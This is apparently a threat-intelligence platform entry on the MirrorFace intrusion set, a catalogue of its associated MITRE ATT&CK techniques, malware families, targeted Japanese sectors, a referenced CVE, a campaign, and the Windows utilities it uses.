MirrorFace
Essential information
- Confidence
- 100/100
- Published
- 21/12/2025 04:36
- Modified
- 04/05/2026 16:33
- Updated at
- 04/05/2026 16:33
- Revoked
- No
- Author / Source
- AlienVault
- Resource level
- —
- Primary motivation
- —
- Related entities
- 2 reports, 77 attack patterns (mitre), 12 malware, 6 sectors, 1 countries, 16 indicators, 1 vulnerabilities (cve), 8 tool, 1 campaign
Description
Marking (TLP)
TLP:CLEAR
External references
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Reports (2)
-
5 Malwares 6 Observables 1 APT
-
1 CVE 21 MITREs 2 Malwares 27 Observables 1 APT
Attack patterns (MITRE) (77)
-
-
MSBuild usesT1127.001 MITRE
-
T1070.001 usesClear Windows Event Logs MITRE
-
T1074.002 usesRemote Data Staging MITRE
-
T1057 usesProcess Discovery MITRE
-
T1204.002 usesMalicious File MITRE
-
T1003 usesOS Credential Dumping MITRE
-
T1587.001 usesMalware MITRE
-
T1564 usesHide Artifacts MITRE
-
T1083 usesFile and Directory Discovery MITRE
-
T1005 usesData from Local System MITRE
-
T1140 usesDeobfuscate/Decode Files or Information MITRE
Malware (12)
-
UPPERCUT uses
-
LODEINFO usesFamily
-
ROAMINGHOUSE uses
-
DOWNIISSA uses
-
NOOPLDR usesFamily
-
FaceXInjector usesFamily
-
UPPERCUT - S0275 usesFamily
-
HiddenFace usesFamily
-
MirrorStealer usesFamily
-
NOOPDOOR usesFamily
-
AsyncRAT usesFamily
-
Cobalt Strike usesFamily
Sectors (6)
-
Academic Institutions targets
-
Diplomacy targets
-
Media targets
-
Defense targets
-
Political parties targets
-
Government targets
Countries (1)
-
Japan targets
Indicators (16)
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 04/10/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 13/08/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 13/08/2025 · Source: AlienVault
-
stix 100/100 Revoked· Valid until 05/11/2025 · Source: AlienVault
Vulnerabilities (CVE) (1)
F5 BIG-IP contains a missing authentication in critical function vulnerability which can allow for remote code execution, creation or deletion of files, …
- Published
- 10/05/2022
- Modified
- 20/12/2025
Tool (8)
-
Wevtutil usesThe MITRE Corporation Confidence 100
[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)
-
ipconfig usesThe MITRE Corporation Confidence 100
[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)
-
Net usesThe MITRE Corporation Confidence 100
The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft…
-
Nltest usesThe MITRE Corporation Confidence 100
[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)
-
nbtstat usesThe MITRE Corporation Confidence 100
[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)
-
Tasklist usesThe MITRE Corporation Confidence 100
The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It…
-
BITSAdmin usesThe MITRE Corporation Confidence 100
[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)
-
Ping usesThe MITRE Corporation Confidence 100
[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)
Campaign (1)
-
Operation AkaiRyū attributed-to